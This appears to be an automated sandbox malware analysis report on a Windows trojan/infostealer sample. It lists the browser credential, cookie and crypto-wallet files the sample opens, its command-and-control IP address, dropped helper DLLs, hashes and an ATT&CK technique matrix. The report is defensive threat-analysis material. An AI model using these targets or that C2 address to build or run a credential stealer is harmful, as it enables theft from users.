                        Source: Yara matchFile source: 00000000.00000003.446552049.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.466555483.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.446585684.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.451981881.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.446651246.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.446518544.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.481057037.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.454619131.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.452125462.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.446733215.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.455974232.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.469287857.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.460242946.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.470300145.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.458303380.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.468368220.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.446552049.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.466555483.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.446585684.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.451981881.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.446651246.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.446518544.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.481057037.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.454619131.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.452125462.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.446733215.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.455974232.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.469287857.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
                        Masquerading
                        1
                        OS Credential Dumping
                        42
                        Security Software Discovery
                        Remote Services1
                        Credential API Hooking
                        Exfiltration Over Other Network Medium3
                        Non-Application Layer Protocol
                        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts22
                        Virtualization/Sandbox Evasion
                        1
                        Credential API Hooking
                        22
                        Virtualization/Sandbox Evasion
                        Remote Desktop Protocol2
                        Data from Local System
                        Exfiltration Over Bluetooth113
                        Application Layer Protocol
                        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager11
                        Process Discovery
                        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
                        Ingress Tool Transfer
                        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS213
                        System Information Discovery
                        Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        VASkmEQ4iU.exe49%ReversingLabsWin32.Trojan.Kelios
                        VASkmEQ4iU.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\LocalLow\freebl3.dll0%VirustotalBrowse
                        C:\Users\user\AppData\LocalLow\freebl3.dll0%MetadefenderBrowse
                        C:\Users\user\AppData\LocalLow\freebl3.dll0%ReversingLabs
                        C:\Users\user\AppData\LocalLow\mozglue.dll0%MetadefenderBrowse
                        C:\Users\user\AppData\LocalLow\mozglue.dll0%ReversingLabs
                        C:\Users\user\AppData\LocalLow\msvcp140.dll0%MetadefenderBrowse
                        C:\Users\user\AppData\LocalLow\msvcp140.dll0%ReversingLabs
                        C:\Users\user\AppData\LocalLow\nss3.dll0%MetadefenderBrowse
                        C:\Users\user\AppData\LocalLow\nss3.dll0%ReversingLabs
                        C:\Users\user\AppData\LocalLow\softokn3.dll0%MetadefenderBrowse
                        C:\Users\user\AppData\LocalLow\softokn3.dll0%ReversingLabs
                        C:\Users\user\AppData\LocalLow\sqlite3.dll0%MetadefenderBrowse
                        C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
                        C:\Users\user\AppData\LocalLow\vcruntime140.dll0%MetadefenderBrowse
                        C:\Users\user\AppData\LocalLow\vcruntime140.dll0%ReversingLabs
                        SourceDetectionScannerLabelLinkDownload
                        0.0.VASkmEQ4iU.exe.de0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        0.2.VASkmEQ4iU.exe.de0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://185.62.56.113/0%Avira URL Cloudsafe
                        http://185.62.56.113/c5e0a800e57a53b399120e5a97b50daa0%Avira URL Cloudsafe
                        https://mozilla.org00%URL Reputationsafe
                        No contacted domains info
                        NameMaliciousAntivirus DetectionReputation
                        http://185.62.56.113/true
                        • Avira URL Cloud: safe
                        unknown
                        http://185.62.56.113/c5e0a800e57a53b399120e5a97b50daatrue
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://ac.ecosia.org/autocomplete?q=VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drfalse
                          high
                          https://duckduckgo.com/chrome_newtabVASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drfalse
                            high
                            http://www.mozilla.com/en-US/blocklist/mozglue.dll.0.drfalse
                              high
                              https://duckduckgo.com/ac/?q=VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drfalse
                                high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoVASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drfalse
                                  high
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drfalse
                                    high
                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchVASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drfalse
                                      high
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drfalse
                                        high
                                        https://mozilla.org0softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sqlite.org/copyright.html.sqlite3.dll.0.drfalse
                                          high
                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            185.62.56.113
                                            unknownNetherlands
                                            62370SNELNLtrue
                                            Joe Sandbox Version:35.0.0 Citrine
                                            Analysis ID:652389
                                            Start date and time: 26/06/202209:34:582022-06-26 09:34:58 +02:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 6m 51s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:VASkmEQ4iU.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:19
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@1/12@0/1
                                            EGA Information:Failed
                                            HDC Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, licensing.mp.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            No simulations
                                            No context
                                            No context
                                            No context
                                            No context
                                            No context
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                            Category:dropped
                                            Size (bytes):73728
                                            Entropy (8bit):1.1874185457069584
                                            Encrypted:false
                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                            MD5:72A43D390E478BA9664F03951692D109
                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):0.698304057893793
                                            Encrypted:false
                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                            MD5:3806E8153A55C1A2DA0B09461A9C882A
                                            SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                            SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                            SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                            Category:dropped
                                            Size (bytes):40960
                                            Entropy (8bit):0.792852251086831
                                            Encrypted:false
                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):684984
                                            Entropy (8bit):6.857030838615762
                                            Encrypted:false
                                            SSDEEP:12288:0oUg2twzqWC4kBNv1pMByWk6TYnhCevOEH07OqHM65BaFBuY3NUNeCLIV/Rqnhab:0oUg2tJWC44WUuY3mMCLA/R+hw
                                            MD5:15B61E4A910C172B25FB7D8CCB92F754
                                            SHA1:5D9E319C7D47EB6D31AAED27707FE27A1665031C
                                            SHA-256:B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
                                            SHA-512:7C1C982A2B597B665F45024A42E343A0A07A6167F77EE428A203F23BE94B5F225E22A270D1A41B655F3173369F27991770722D765774627229B6B1BBE2A6DC3F
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.9b.........."!.........6...........................................................@A........................4,..S....,..........x............T..........8$...&...............................0..................D............................text............................... ..`.rdata.......0......................@..@.data...<F...@.......&..............@....00cfg...............(..............@..@.rsrc...x............*..............@..@.reloc..8$.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):627128
                                            Entropy (8bit):6.792651884784197
                                            Encrypted:false
                                            SSDEEP:12288:dfsiG5KNZea77VUHQqROmbIDm0ICRfCtbtEE/2OH9E2ARlZYSd:df53NZea3V+QqROmum0nRKx79E2ARlrd
                                            MD5:F07D9977430E762B563EAADC2B94BBFA
                                            SHA1:DA0A05B2B8D269FB73558DFCF0ED5C167F6D3877
                                            SHA-256:4191FAF7E5EB105A0F4C5C6ED3E9E9C71014E8AA39BBEE313BC92D1411E9E862
                                            SHA-512:6AFD512E4099643BBA3FC7700DD72744156B78B7BDA10263BA1F8571D1E282133A433215A9222A7799F9824F244A2BC80C2816A62DE1497017A4B26D562B7EAF
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........V......./....................................................@A............................cQ......,....p...............r..........4C...........................W......h0...............................................text............................... ..`.rdata.......0......................@..@.data........0......................@....00cfg.......P....... ..............@..@.tls.........`......."..............@....rsrc........p.......$..............@..@.reloc..4C.......D..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):449280
                                            Entropy (8bit):6.670243582402913
                                            Encrypted:false
                                            SSDEEP:12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
                                            MD5:1FB93933FD087215A3C7B0800E6BB703
                                            SHA1:A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
                                            SHA-256:2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
                                            SHA-512:79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):2042296
                                            Entropy (8bit):6.775178510549486
                                            Encrypted:false
                                            SSDEEP:49152:6dvFywfzFAF7fg39IwA49Kap9bGt+qoStYnOsbqbeQom7gN7BpDD5SkIN1g5D92+:pptximYfpx8OwNiVG09
                                            MD5:F67D08E8C02574CBC2F1122C53BFB976
                                            SHA1:6522992957E7E4D074947CAD63189F308A80FCF2
                                            SHA-256:C65B7AFB05EE2B2687E6280594019068C3D3829182DFE8604CE4ADF2116CC46E
                                            SHA-512:2E9D0A211D2B085514F181852FAE6E7CA6AED4D29F396348BEDB59C556E39621810A9A74671566A49E126EC73A60D0F781FA9085EB407DF1EEFD942C18853BE5
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........&...............................................`............@A.........................!..\...T...@....@..x....................P..h...h...................................................\....!..@....................text...i........................... ..`.rdata..............................@..@.data....N.......*..................@....00cfg.......0......................@..@.rsrc...x....@......................@..@.reloc..h....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):4.621829903792328
                                            Encrypted:false
                                            SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                                            MD5:1B7C22A214949975556626D7217E9A39
                                            SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                                            SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                                            SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                                            Malicious:false
                                            Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                            Category:dropped
                                            Size (bytes):73728
                                            Entropy (8bit):1.1874185457069584
                                            Encrypted:false
                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                            MD5:72A43D390E478BA9664F03951692D109
                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                            Malicious:false
                                            Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):254392
                                            Entropy (8bit):6.686038834818694
                                            Encrypted:false
                                            SSDEEP:6144:uI7A8DMhFE2PlKOcpHSvV6x/CHQyhvs277H0mhWGzTdtb2bbIFxW7zrM2ruyYz+h:uI7A8DMhFE2PlbcpSv0x/CJVUmhDzTvS
                                            MD5:63A1FE06BE877497C4C2017CA0303537
                                            SHA1:F4F9CBD7066AFB86877BB79C3D23EDDACA15F5A0
                                            SHA-256:44BE3153C15C2D18F49674A092C135D3482FB89B77A1B2063D01D02985555FE0
                                            SHA-512:0475EDC7DFBE8660E27D93B7B8B5162043F1F8052AB28C87E23A6DAF9A5CB93D0D7888B6E57504B1F2359B34C487D9F02D85A34A7F17C04188318BB8E89126BF
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...'.9b.........."!......................................................................@A........................tv..S....w...................................5..hq..............................................D{...............................text...V........................... ..`.rdata..............................@..@.data................~..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1099223
                                            Entropy (8bit):6.502588297211263
                                            Encrypted:false
                                            SSDEEP:24576:9jxwSkSteuT4P/y7HjsXAGJyGvN5z4Rui2IXLbO:9Vww8HyrjsvyWN54RZH+
                                            MD5:DBF4F8DCEFB8056DC6BAE4B67FF810CE
                                            SHA1:BBAC1DD8A07C6069415C04B62747D794736D0689
                                            SHA-256:47B64311719000FA8C432165A0FDCDFED735D5B54977B052DE915B1CBBBF9D68
                                            SHA-512:B572CA2F2E4A5CC93E4FCC7A18C0AE6DF888AA4C55BC7DA591E316927A4B5CFCBDDA6E60018950BE891FF3B26F470CC5CCE34D217C2D35074322AB84C32A25D1
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".,b.v.........!......................... .....a......................................... .........................n*................................... ...;...................................................................................text...............................`.P`.data...|'... ...(..................@.`..rdata...D...P...F...:..............@.`@.bss....(.............................`..edata..n*.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............&..............@.0B/70.....#............2..
                                            Process:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):80128
                                            Entropy (8bit):6.906674531653877
                                            Encrypted:false
                                            SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                            MD5:1B171F9A428C44ACF85F89989007C328
                                            SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                            SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                            SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.970117994739455
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:VASkmEQ4iU.exe
                                            File size:7389696
                                            MD5:f9b340f49ab31913222c64d3eed70ed3
                                            SHA1:4246faa6c02672009aaf44940ec9e1c9f3e72df9
                                            SHA256:06cd1b17015926da3c902f7b67e130054e9170f355a1cdf1274ddc955f4152ee
                                            SHA512:e8e5386c31e4102d84353d8b17f5ed3e2585ff8d3321b1b7843c6f41ad2463b8efd5a6af488858c05048cbef36c3104e7753d9a79f98a5c133cec601f47f1f1e
